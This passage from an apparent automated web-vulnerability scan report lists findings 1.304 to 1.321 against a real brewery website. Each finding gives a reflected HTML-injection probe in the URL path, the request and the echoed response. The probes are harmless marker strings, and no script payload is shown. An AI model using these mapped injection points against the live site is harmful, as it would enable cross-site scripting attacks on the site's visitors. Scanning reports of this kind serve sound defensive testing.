1.304. http://www.ninkasibrewing.com/facebook/content/img/skin/ninkasi-random/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /facebook/content/img/skin/ninkasi-random/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1184"><a>83d2b21934b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebooka1184"><a>83d2b21934b/content/img/skin/ninkasi-random/ HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:45:02 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="facebooka1184"><a>83d2b21934b_page" class="facebooka1184">
...[SNIP]...

1.305. http://www.ninkasibrewing.com/facebook/content/img/skin/ninkasi-random/content/css/basic.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /facebook/content/img/skin/ninkasi-random/content/css/basic.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c0479"><a>259ace437e4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebookc0479"><a>259ace437e4/content/img/skin/ninkasi-random/content/css/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:06 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="facebookc0479"><a>259ace437e4_page" class="facebookc0479">
...[SNIP]...

1.306. http://www.ninkasibrewing.com/facebook/content/img/skin/ninkasi-random/content/css/ninkasi.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /facebook/content/img/skin/ninkasi-random/content/css/ninkasi.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d72d"><a>662f9a27440 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebook3d72d"><a>662f9a27440/content/img/skin/ninkasi-random/content/css/ninkasi.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="facebook3d72d"><a>662f9a27440_page" class="facebook3d72d">
...[SNIP]...

1.307. http://www.ninkasibrewing.com/facebook/content/img/skin/ninkasi-random/content/css/print.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /facebook/content/img/skin/ninkasi-random/content/css/print.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7fbed"><a>b1ab901368a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebook7fbed"><a>b1ab901368a/content/img/skin/ninkasi-random/content/css/print.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:11 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="facebook7fbed"><a>b1ab901368a_page" class="facebook7fbed">
...[SNIP]...

1.308. http://www.ninkasibrewing.com/facebook/content/img/skin/ninkasi-random/content/js/basic.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /facebook/content/img/skin/ninkasi-random/content/js/basic.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14bee"><a>7966f95bbb5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebook14bee"><a>7966f95bbb5/content/img/skin/ninkasi-random/content/js/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:15 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="facebook14bee"><a>7966f95bbb5_page" class="facebook14bee">
...[SNIP]...

1.309. http://www.ninkasibrewing.com/facebook/content/img/skin/ninkasi-random/content/js/combined.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /facebook/content/img/skin/ninkasi-random/content/js/combined.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af568"><a>e655369a8f7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebookaf568"><a>e655369a8f7/content/img/skin/ninkasi-random/content/js/combined.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:14 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="facebookaf568"><a>e655369a8f7_page" class="facebookaf568">
...[SNIP]...

1.310. http://www.ninkasibrewing.com/facebook/content/img/skin/ninkasi-random/content/js/combined.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /facebook/content/img/skin/ninkasi-random/content/js/combined.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bcab8"><a>b4e49b085cc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebookbcab8"><a>b4e49b085cc/content/img/skin/ninkasi-random/content/js/combined.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="facebookbcab8"><a>b4e49b085cc_page" class="facebookbcab8">
...[SNIP]...

1.311. http://www.ninkasibrewing.com/facebook/content/js/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /facebook/content/js/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5e7b"><a>92edcf6844e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebookf5e7b"><a>92edcf6844e/content/js/ HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:45:03 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="facebookf5e7b"><a>92edcf6844e_page" class="facebookf5e7b">
...[SNIP]...

1.312. http://www.ninkasibrewing.com/facebook/content/js/basic.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /facebook/content/js/basic.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ccd76"><a>cf3d86cfba9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebookccd76"><a>cf3d86cfba9/content/js/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.ninkasibrewing.com/facebook/
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:45:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="facebookccd76"><a>cf3d86cfba9_page" class="facebookccd76">
...[SNIP]...

1.313. http://www.ninkasibrewing.com/facebook/content/js/combined.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /facebook/content/js/combined.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4c86"><a>90405adf417 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebooke4c86"><a>90405adf417/content/js/combined.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.ninkasibrewing.com/facebook/
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:45:07 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="facebooke4c86"><a>90405adf417_page" class="facebooke4c86">
...[SNIP]...

1.314. http://www.ninkasibrewing.com/facebook/content/js/combined.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /facebook/content/js/combined.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7bd20"><a>8eded1a6aaa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebook7bd20"><a>8eded1a6aaa/content/js/combined.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.ninkasibrewing.com/facebook/
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:45:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="facebook7bd20"><a>8eded1a6aaa_page" class="facebook7bd20">
...[SNIP]...

1.315. http://www.ninkasibrewing.com/facebook/content/js/content/css/basic.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /facebook/content/js/content/css/basic.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f08d3"><a>32a16c21b89 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebookf08d3"><a>32a16c21b89/content/js/content/css/basic.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:14 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="facebookf08d3"><a>32a16c21b89_page" class="facebookf08d3">
...[SNIP]...

1.316. http://www.ninkasibrewing.com/facebook/content/js/content/css/ninkasi.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /facebook/content/js/content/css/ninkasi.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 694a2"><a>600e3070e71 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebook694a2"><a>600e3070e71/content/js/content/css/ninkasi.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:14 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="facebook694a2"><a>600e3070e71_page" class="facebook694a2">
...[SNIP]...

1.317. http://www.ninkasibrewing.com/facebook/content/js/content/css/print.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /facebook/content/js/content/css/print.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9d13"><a>4dcbedf8a30 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebooka9d13"><a>4dcbedf8a30/content/js/content/css/print.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="facebooka9d13"><a>4dcbedf8a30_page" class="facebooka9d13">
...[SNIP]...

1.318. http://www.ninkasibrewing.com/facebook/content/js/content/js/basic.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /facebook/content/js/content/js/basic.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d5ea"><a>bca6b40fe7b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebook2d5ea"><a>bca6b40fe7b/content/js/content/js/basic.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:23 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="facebook2d5ea"><a>bca6b40fe7b_page" class="facebook2d5ea">
...[SNIP]...

1.319. http://www.ninkasibrewing.com/facebook/content/js/content/js/combined.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /facebook/content/js/content/js/combined.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90ee5"><a>3e6417b9771 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebook90ee5"><a>3e6417b9771/content/js/content/js/combined.css HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="facebook90ee5"><a>3e6417b9771_page" class="facebook90ee5">
...[SNIP]...

1.320. http://www.ninkasibrewing.com/facebook/content/js/content/js/combined.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /facebook/content/js/content/js/combined.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4808"><a>15a45105ef8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /facebooke4808"><a>15a45105ef8/content/js/content/js/combined.js HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: PHPSESSID=4o33ishep9gqp223c2cg8e5jf1;

Response

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 21:53:26 GMT
Server: Apache
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 13216

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

       <base href="http://www.n
...[SNIP]...
<body id="facebooke4808"><a>15a45105ef8_page" class="facebooke4808">
...[SNIP]...

1.321. http://www.ninkasibrewing.com/help/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.ninkasibrewing.com
Path:   /help/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d171a"><a>6ee7d9ed931 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /helpd171a"><a>6ee7d9ed931/ HTTP/1.1
Host: www.ninkasibrewing.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.ninkasibrewing.com/
Cookie: PHPSESSID=lgog9cm9mfbve3sk8vts9buej4;

Response

HTTP/1.1 200 OK
